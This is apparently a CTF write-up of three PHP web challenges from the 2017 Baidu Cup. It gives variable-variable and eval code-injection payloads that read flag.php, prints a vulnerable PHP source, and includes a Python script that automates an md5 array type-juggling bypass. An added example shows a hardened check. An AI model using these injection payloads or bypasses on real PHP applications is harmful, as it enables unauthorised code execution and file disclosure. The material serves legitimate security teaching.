"Baidu Cup" CTF Competition 2017 February (Misc Web)

  • Blast-1 :

Open the link; it returns a 502.

I append a parameter directly to the URL: ?a=1

The page then outputs a piece of code.

The code passes $$a to var_dump(). $$a is a variable variable, so the superglobal GLOBALS may be used.

Pass GLOBALS as the value of the hello parameter.

This gets the flag.

  • Blast-2 :

Open the link.

var_dump() outputs the type and value of a variable.

eval() executes a string as PHP code.

There are two ways to get the flag:

1: ?hello=file('flag.php')

2: ?hello=);show_source('flag.php');var_dump(

  • Blast-3 :

Open the link; it shows PHP code again:

<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

Key points:

The value of the variable $str_rands is 2 random lowercase letters.

If $_SESSION['whoami'] equals the first two elements of the value parameter ($value[0].$value[1]), and the 4-character substring of md5($value) starting at offset 5 loosely equals 0, nums increases by 1 and whoami is updated to the new $str_rands, which is echoed in the response. Once nums passes the final check ($_SESSION['nums']>=10), you get the flag.

Passing an array bypasses the md5 check, because the md5() function returns null when given an array, and null==0.

The first request passes ?value[]=ea

The second request passes ?value[]=mj (the two letters echoed by the previous response), and so on.

You can write a Python script to run it:

import requests

# One session object keeps the PHP session cookie, so nums accumulates
s = requests.session()

base = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]="

# A fresh session starts with whoami = 'ea'
r = s.get(base + "ea")

for i in range(10):
    # Each successful response begins with the two new letters for whoami
    r = s.get(base + r.text[:2])
    print(r.url)
    if 'flag{' in r.text:
        print(r.text)
        break

Running the script gets the flag.
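The array bypass in Blast-3 works because the check compares loosely and never verifies that value is a string. The following is an added example, not part of the original write-up or the challenge code: check_loose() repeats the challenge's comparison, while check_strict(), its '0000' target and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example. check_loose() mirrors the challenge's condition;
// check_strict() is a hypothetical hardened replacement.

function check_loose($whoami, $value)
{
    // For ['ea'], $value[1] is unset and concatenates as '', so the prefix is 'ea'.
    // PHP 5/7: md5(array) warns and returns NULL, substr(NULL, 5, 4) is false,
    // and false == 0 is true. PHP 8: md5(array) throws a TypeError instead.
    // The @ operators stand in for the challenge's error_reporting(0).
    return $whoami == (@$value[0] . @$value[1])
        && @substr(@md5($value), 5, 4) == 0;
}

function check_strict($whoami, $value)
{
    // Reject arrays and every other non-string before hashing.
    if (!is_string($value) || strlen($value) < 2) {
        return false;
    }
    // === compares type and value, so NULL or false can never match.
    // '0000' is an assumed target for the hash slice.
    return $whoami === substr($value, 0, 2)
        && substr(md5($value), 5, 4) === '0000';
}

// Constructed inputs: the array produced by ?value[]=ea and a plain string.
$inputs = array('array' => array('ea'), 'string' => 'ea-constructed');

foreach ($inputs as $label => $value) {
    try {
        $loose = check_loose('ea', $value);
    } catch (TypeError $e) {
        $loose = false; // PHP 8 refuses the array outright
    }
    printf("%-6s loose=%s strict=%s\n", $label,
        var_export($loose, true),
        var_export(check_strict('ea', $value), true));
}
```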
